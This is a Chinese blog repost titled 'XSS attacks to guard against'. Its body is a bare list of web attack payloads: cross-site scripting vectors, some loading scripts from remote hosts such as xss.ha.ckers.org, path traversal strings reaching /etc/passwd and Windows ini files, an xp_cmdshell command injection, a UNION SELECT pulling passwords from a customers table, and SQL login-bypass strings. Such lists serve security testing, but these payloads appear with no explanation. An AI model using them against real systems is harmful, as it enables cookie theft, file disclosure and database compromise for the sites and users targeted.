zoukankan
html css js c++ java
需要防范的XSS攻击
>
<
script
>
alert(document.cookie)
</
script
>
='>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(vulnerable)
</
script
>
%3Cscript%3Ealert('XSS')%3C/script%3E
<
script
>
alert('XSS')
</
script
>
<
img
src
="javascript:alert('XSS')"
>
%0a%0a
<
script
>
alert(\
"
Vulnerable\
"
)
</
script
>
.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<
script
>
alert('Vulnerable');
</
script
>
<
script
>
alert('Vulnerable')
</
script
>
?sql_debug=1
a%5c.aspx
a.jsp/
<
script
>
alert('Vulnerable')
</
script
>
a/
a?
<
script
>
alert('Vulnerable')
</
script
>
">
<
script
>
alert('Vulnerable')
</
script
>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E
&SESSION_ID
={SESSION_ID}
&SESSION_ID
=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"
<
XSS
>
=&{()}
<
IMG
SRC
="javascript:alert('XSS');"
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert("XSS")
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
"
<
IMG
SRC
=java\0script:alert(\"XSS\")
>
";' > out
<
IMG
SRC
=" javascript:alert('XSS');"
>
<
SCRIPT
>
a
=/
XSS
/
alert(a.source)
</
SCRIPT
>
<
BODY
BACKGROUND
="javascript:alert('XSS')"
>
<
BODY
ONLOAD
=alert('XSS')
>
<
IMG
DYNSRC
="javascript:alert('XSS')"
>
<
IMG
LOWSRC
="javascript:alert('XSS')"
>
<
BGSOUND
SRC
="javascript:alert('XSS');"
>
<
br
size
="&{alert('XSS')}"
>
<
LAYER
SRC
="http://xss.ha.ckers.org/a.js"
></
layer
>
<
LINK
REL
="stylesheet"
HREF
="javascript:alert('XSS');"
>
<
IMG
SRC
='vbscript:msgbox("XSS")'
>
<
IMG
SRC
="mocha:[code]"
>
<
IMG
SRC
="livescript:[code]"
>
<
META
HTTP-EQUIV
="refresh"
CONTENT
="0;url=javascript:alert('XSS');"
>
<
IFRAME
SRC
=javascript:alert('XSS')
></
IFRAME
>
<
FRAMESET
><
FRAME
SRC
=javascript:alert('XSS')
></
FRAME
></
FRAMESET
>
<
TABLE
BACKGROUND
="javascript:alert('XSS')"
>
<
DIV
STYLE
="background-image: url(javascript:alert('XSS'))"
>
<
DIV
STYLE
="behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<
DIV
STYLE
=" expression(alert('XSS'));"
>
<
STYLE
>
@im\port'\ja\vasc\ript:alert("XSS")';
</
STYLE
>
<
IMG
STYLE
='xss:expre\ssion(alert("XSS"))'
>
<
STYLE
TYPE
="text/javascript"
>
alert('XSS');
</
STYLE
>
<
STYLE
TYPE
="text/css"
>
.XSS
{
}
{
background-image
:
url("javascript:alert('XSS')")
;
}
</
STYLE
><
A
CLASS
=XSS
></
A
>
<
STYLE
type
="text/css"
>
BODY
{
}
{
background
:
url("javascript:alert('XSS')")
}
</
STYLE
>
<
BASE
HREF
="javascript:alert('XSS');//"
>
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML
SRC
="javascript:alert('XSS');"
>
">
<
BODY
ONLOAD
="a();"
><
SCRIPT
>
function
a()
{alert('XSS');}
</
SCRIPT
><
"
<SCRIPT
SRC
=""
></
SCRIPT
>
<
IMG
SRC
="javascript:alert('XSS')"
<!--#exec cmd
="/bin/echo '<SCRIPT SRC'"
--
>
<!--
#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"
-->
<
IMG
SRC
="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<
SCRIPT
a
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
a
=">"
'' SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
"a
='
>
'
"
SRC=
"
http:
//
xss.ha.ckers.org/a.js"></SCRIPT>
<
SCRIPT
>
document.write(
"
<SCRI
"
);
</
SCRIPT
>
PT SRC="http://xss.ha.ckers.org/a.js">
</
SCRIPT
>
<
A
HREF
=http://www.gohttp://www.google.com/ogle.com
/>
link
</
A
>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
QQ:273352165 evlon#126.com 转载请注明出处。
查看全文
相关阅读:
Loadrunner 9.5_webservice(SOAP)性能测试
oracle分层查询中的start with和connect by(树结构查询)
解析Nginx负载均衡
Nginx+tomcat配置集群负载均衡
基于Nginx反向代理及负载均衡
什么是反向代理,如何区别反向与正向代理
软件测试策略
软件测试策略的制定过程
php 模拟get和post提交方法[解决ajax跨域问题]
解决ajax跨域问题的多种方法
原文地址:https://www.cnblogs.com/evlon/p/849543.html
最新文章
前端js框架收藏
创业实战go语言制作网站(转)
NoSql数据库使用半年后在设计上面的一些心得 (转)
ShopNc商城修改详情
网站资料收集 主要查看js的学习部分
JAVA面试精选【Java基础第一部分】
听豆瓣架构变迁分享会总结 (转)
Coding和Git的环境搭建
6.03-news_xpath2
6.02-news_re
热门文章
6.01-re-split_chinese
Python3爬虫 利用百度地图api得到城市经纬度
5.06-re
5.05-requests_cookies2
5.04-requests_cookies
5.03-requests_ssl
5.02-requests_proxy
5.01-requests_auth
Cookie文件格式解析
浅谈cookie测试
Copyright © 2011-2022 走看看